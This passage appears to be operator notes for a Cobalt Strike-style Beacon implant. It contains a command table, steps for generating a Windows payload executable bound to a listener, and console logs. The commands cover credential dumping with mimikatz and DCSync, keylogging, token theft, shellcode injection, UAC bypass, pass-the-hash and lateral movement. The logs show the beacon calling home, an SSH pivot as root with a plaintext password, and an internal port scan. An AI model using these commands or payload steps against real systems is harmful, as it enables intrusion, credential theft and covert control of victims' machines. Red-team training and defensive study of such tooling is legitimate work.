| Command | Description |
| ------- | ----------- |
| argue | Spoof arguments for matching processes |
| blockdlls | Block non-Microsoft DLLs in child processes |
| browserpivot | Setup a browser pivot session |
| bypassuac | Try to obtain the privileges of a high-privilege process |
| cancel | Cancel a download task; for example, a very large file may take a long time to download, and if you do not want to continue partway through, this cancels it |
| cd | Change directory |
| checkin | Force the target to check in (call back) once |
| clear | Clear Beacon's internal task queue |
| connect | Connect to a Beacon peer over TCP |
| covertvpn | Deploy a Covert VPN client |
| cp | Copy a file to a directory |
| dcsync | Extract a password hash from a DC |
| desktop | View and interact with target's desktop |
| dllinject | Inject a Reflective DLL into a process |
| dllload | Load DLL into a process with LoadLibrary() |
| download | Download a file |
| downloads | List files currently being downloaded |
| drives | List all drives on the target |
| elevate | Try to elevate the current ordinary user to a privileged user |
| execute | Execute a program on target (no output) |
| execute-assembly | Execute a local .NET program in-memory on target |
| exit | Exit the current shell |
| getprivs | Enable privileges on the current user's token |
| getsystem | Try to obtain SYSTEM privileges on the current system |
| getuid | Get the current user name |
| hashdump | Grab plaintext passwords from the current lsass |
| help | Show command usage and parameters |
| inject | Spawn a session in a specific process |
| jobkill | Kill a long-running background job |
| jobs | List long-running background jobs |
| kerberos_ccache_use | Apply kerberos ticket from cache to this session |
| kerberos_ticket_purge | Purge kerberos tickets from this session |
| kerberos_ticket_use | Apply kerberos ticket to this session |
| keylogger | Inject a keystroke logger into a process |
| kill | Kill a process |
| link | Connect to a Beacon peer over a named pipe |
| logonpasswords | Dump credentials and hashes with mimikatz |
| ls | List all file names in the current directory |
| make_token | Create a token to pass credentials |
| mimikatz | Run the mimikatz tool; must be combined with a mimikatz command |
| mkdir | Create a directory |
| mode dns | Use DNS A as data channel (DNS beacon only) |
| mode dns-txt | Use DNS TXT as data channel (DNS beacon only) |
| mode dns6 | Use DNS AAAA as data channel (DNS beacon only) |
| mode http | Use HTTP as data channel |
| mv | Move a file to a path |
| net | Network and host enumeration tool |
| note | Give the current machine a label, e.g. `note beacon-shell` |
| portscan | Scan a network for open services |
| powerpick | Execute a command via Unmanaged PowerShell |
| powershell | `powershell` + command: run a PowerShell command on the target host |
| powershell-import | Import a PowerShell script into memory |
| ppid | Set parent PID for spawned post-ex jobs |
| ps | List all processes on the current system |
| psexec | Use a service to spawn a session on a host |
| psexec_psh | Use PowerShell to spawn a session on a host |
| psinject | Execute PowerShell command in specific process |
| pth | Pass-the-hash using Mimikatz |
| pwd | Print the current directory path |
| reg | Query the registry |
| rev2self | Revert to original token |
| rm | Delete a file or folder |
| rportfwd | Setup a reverse port forward |
| run | Execute a program on target (returns output) |
| runas | Execute a program as another user |
| runasadmin | Execute a program in a high-integrity context |
| runu | Execute a program under another PID |
| screenshot | Take a screenshot |
| setenv | Set an environment variable |
| shell | `shell` + command: run a CMD command on the target host |
| shinject | Inject shellcode into a process |
| shspawn | Spawn process and inject shellcode into it |
| sleep | Set the check-in (heartbeat) interval between the server and the client |
| socks | Start a SOCKS4a server to relay traffic |
| socks stop | Stop the SOCKS4a server |
| spawn | Spawn a new session |
| spawnas | Spawn a session as another user |
| spawnto | Set executable to spawn processes into |
| spawnu | Spawn a session under another PID |
| ssh | Run the ssh command to connect to a Linux server |
| ssh-key | Use SSH to spawn an SSH session on a host |
| steal_token | Steal access token from a process |
| timestomp | Apply timestamps from one file to another |
| unlink | Disconnect from parent Beacon |
| upload | Upload a file from the local machine to the target host |
| wdigest | Dump plaintext credentials with mimikatz |
| winrm | Use WinRM to spawn a session on a host |
| wmi | Use a WMI command to execute on the target host |
| Ctrl+k | Clear the screen |
Attacks → Packages → Windows Executable → set(Listener,Output,x64) → windows EXE
Windows Executable
- Listener: choose a configured listener
  - Add: create a new listener: New Listener(name, payload, host, port)
- Output: choose an executable type
  - windows exe: x86/x64 executable
  - windows server exe: x86/x64 executable
  - windows dll (32-bit): 32-bit DLL (dynamic link library)
  - windows dll (64-bit): 64-bit DLL (dynamic link library)
- x64: check this box to generate a 64-bit file
```
beacon> ssh 192.168.3.116:22 root 1234
[*] Tasked beacon to SSH to 192.168.3.116:22 as root
[+] host called home, sent: 437307 bytes
[+] host called home, sent: 34 bytes
[+] established link to child session: 192.168.3.116
```
16. Scan the internal network for other live hosts
```
beacon> portscan 192.168.3.0-192.168.3.254 1-1024 arp 1024
[*] Tasked beacon to scan ports 1-1024 on 192.168.3.0-192.168.3.254
```